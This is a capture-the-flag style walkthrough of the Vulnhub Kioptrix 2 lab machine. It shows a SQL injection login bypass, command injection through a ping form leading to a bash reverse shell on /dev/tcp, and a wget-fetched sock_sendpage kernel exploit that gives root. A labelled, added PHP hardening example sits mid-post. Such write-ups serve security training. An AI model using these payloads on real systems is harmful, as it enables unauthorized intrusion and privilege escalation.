Vulnhub: Detailed Testing Process of the Kioptrix 2 Target Machine (Privilege Escalation Successful)

Kioptrix 2

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24
Currently scanning: 10.1.1.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 10.1.1.1        00:50:56:c0:00:01      1      60  VMware, Inc.
 10.1.1.130      00:0c:29:b2:33:a0      1      60  VMware, Inc.
 10.1.1.254      00:50:56:f7:60:d6      1      60  VMware, Inc.

Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 10.1.1.130.

Nmap scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.130 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-09 05:45 EST
Nmap scan report for 10.1.1.130
Host is up (0.00068s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 
|   1024 8f3e8b1e5863fecf27a318093b52cf72 (RSA1)
|   1024 346b453dbacecab25355ef1e43703836 (DSA)
|_  1024 684d8cbbb65abd7971b87147ea004261 (RSA)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            629/udp   status
|_  100024  1            632/tcp   status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_http-server-header: Apache/2.0.52 (CentOS)
|_ssl-date: 2023-02-09T08:36:16+00:00; -2h09m40s from scanner time.
631/tcp  open  ipp      CUPS 1.1
|_http-title: 403 Forbidden
| http-methods:
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
632/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:B2:33:A0 (VMware)

Host script results:
|_clock-skew: -2h09m40s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.00 seconds

Getting a shell

Port 3306

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2]
└─$ mysql -uroot -p -h 10.1.1.130
Enter password: 
ERROR 1130 (HY000): Host '10.1.1.143' is not allowed to connect to this MySQL server

Host-based access rules appear to be in place, so this direction is abandoned.

Port 80

Visiting port 80 in a browser returns a user login page; a simple SQL injection bypass string is enough to log in successfully:

admin' or 1=1 -- 

After logging in successfully, the page offers a ping-command feature; check whether it is vulnerable to command injection.

Submit the following:

127.0.0.1;which python

The command output is returned successfully, so the next step is to obtain a shell:

127.0.0.1;bash -i >& /dev/tcp/10.1.1.143/5555 0>&1

The reverse shell from the target is received successfully on Kali Linux:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2]
└─$ sudo nc -nlvp 5555                                     
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [10.1.1.143] from (UNKNOWN) [10.1.1.130] 32769
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ 

bash-3.00$ cat index.php
<?php
        mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
        //print "Connected to MySQL<br />";
        mysql_select_db("webapp");

        if ($_POST['uname'] != ""){
                $username = $_POST['uname'];
                $password = $_POST['psw'];
                $query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
                //print $query."<br>";
                $result = mysql_query($query);

                $row = mysql_fetch_array($result);
                //print "ID: ".$row['id']."<br />";
        }

?>
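As an added example (not part of the original post or the Kioptrix 2 code), this is how the two weaknesses above would be closed in PHP: the login query built by string concatenation becomes a prepared statement, and the ping handler, whose source the post does not show (the `target` field name and `pingHost()` are assumed here), allow-lists its input before any command is assembled. It assumes mysqli and a hypothetical `password_hash` column in place of the plaintext `password` column.

```php
<?php
// Added example, not the Kioptrix 2 source: hardened versions of the login
// query above and of the ping feature. Assumes mysqli with the "webapp"
// database and a hypothetical password_hash column in the users table.

function authenticate(mysqli $db, string $username, string $password): bool
{
    // A bound parameter keeps "admin' or 1=1 -- " as a plain string value;
    // it can no longer alter the structure of the SELECT.
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = ? LIMIT 1');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    // password_verify() compares in constant time; a missing row fails the same way.
    return $row !== null && password_verify($password, $row['password_hash']);
}

function pingHost(string $target): string
{
    // Allow-list the input: only a syntactically valid IP address is accepted,
    // so "127.0.0.1;which python" is rejected before any command is assembled.
    if (filter_var($target, FILTER_VALIDATE_IP) === false) {
        throw new InvalidArgumentException('target must be an IP address');
    }
    // escapeshellarg() is a second layer even though the allow-list already
    // excludes ';', '|', '&', '$' and whitespace.
    $out = shell_exec('ping -c 3 ' . escapeshellarg($target) . ' 2>&1');
    return is_string($out) ? $out : '';
}

// Credentials should come from configuration, not be hardcoded as in index.php.
$db = new mysqli('localhost', 'john', getenv('WEBAPP_DB_PASSWORD') ?: '', 'webapp');

if (($_POST['uname'] ?? '') !== '') {
    if (!authenticate($db, $_POST['uname'], $_POST['psw'] ?? '')) {
        http_response_code(401);
        exit('Login failed');
    }
    // "target" is an assumed field name; the original form is not shown in the post.
    try {
        echo htmlspecialchars(pingHost($_POST['target'] ?? ''), ENT_QUOTES, 'UTF-8');
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        exit('Invalid target');
    }
}
```

With this in place, the bypass string and the `;`-chained payload from the walkthrough both fail: the first is looked up as a literal username, the second never reaches the shell.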

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2]
└─$ searchsploit kernel 2 | grep 9545.c                                                         
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation                                                              | linux/local/9545.c

bash-3.00$ wget http://10.1.1.143:8000/9545.c
wget http://10.1.1.143:8000/9545.c
--04:49:15--  http://10.1.1.143:8000/9545.c
           => `9545.c'
Connecting to 10.1.1.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,408 (9.2K) [text/x-csrc]

100%[====================================>] 9,408         --.--K/s             

04:49:15 (22.32 MB/s) - `9545.c' saved [9408/9408]

bash-3.00$ gcc -Wall -m64 -o exploit3 9545.c
gcc -Wall -m64 -o exploit3 9545.c
9545.c:1: sorry, unimplemented: 64-bit mode not compiled in
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ls -alh
ls -alh
total 888K
drwxr-xrwx   4 root   root   4.0K Feb  9 04:50 .
drwxr-xr-x  23 root   root   4.0K Feb  9 03:31 ..
-rw-r--r--   1 apache apache  15K Feb  9  2023 33321.c
-rw-r--r--   1 apache apache 2.5K Feb  9  2023 9542.c
-rw-r--r--   1 apache apache 9.2K Feb  9  2023 9545.c
-rwxr-xr-x   1 apache apache 6.8K Feb  9 04:34 exploit1
-rwxr-xr-x   1 apache apache  12K Feb  9 04:43 exploit2
drwxrwxrwt   2 root   root   4.0K Feb  9 03:32 .font-unix
drwxrwxrwt   2 root   root   4.0K Feb  9 03:31 .ICE-unix
-rwxr-xr-x   1 apache apache 809K Feb  4 23:25 linpeas.sh
bash-3.00$ gcc -o exploit3 9545.c
gcc -o exploit3 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ls
ls
33321.c  9542.c  9545.c  exploit1  exploit2  exploit3  linpeas.sh
bash-3.00$ ls -alh
ls -alh
total 896K
drwxr-xrwx   4 root   root   4.0K Feb  9 04:55 .
drwxr-xr-x  23 root   root   4.0K Feb  9 03:31 ..
-rw-r--r--   1 apache apache  15K Feb  9  2023 33321.c
-rw-r--r--   1 apache apache 2.5K Feb  9  2023 9542.c
-rw-r--r--   1 apache apache 9.2K Feb  9  2023 9545.c
-rwxr-xr-x   1 apache apache 6.8K Feb  9 04:34 exploit1
-rwxr-xr-x   1 apache apache  12K Feb  9 04:43 exploit2
-rwxr-xr-x   1 apache apache 6.7K Feb  9 04:55 exploit3
drwxrwxrwt   2 root   root   4.0K Feb  9 03:32 .font-unix
drwxrwxrwt   2 root   root   4.0K Feb  9 03:31 .ICE-unix
-rwxr-xr-x   1 apache apache 809K Feb  4 23:25 linpeas.sh
bash-3.00$ chmod +x exploit3
chmod +x exploit3
bash-3.00$ ./exploit3
./exploit3
sh-3.00# cd /root
cd /root

The other privilege-escalation exploits, such as 9542.c, all failed.

posted @ 2023-02-09 20:17  Jason_huawen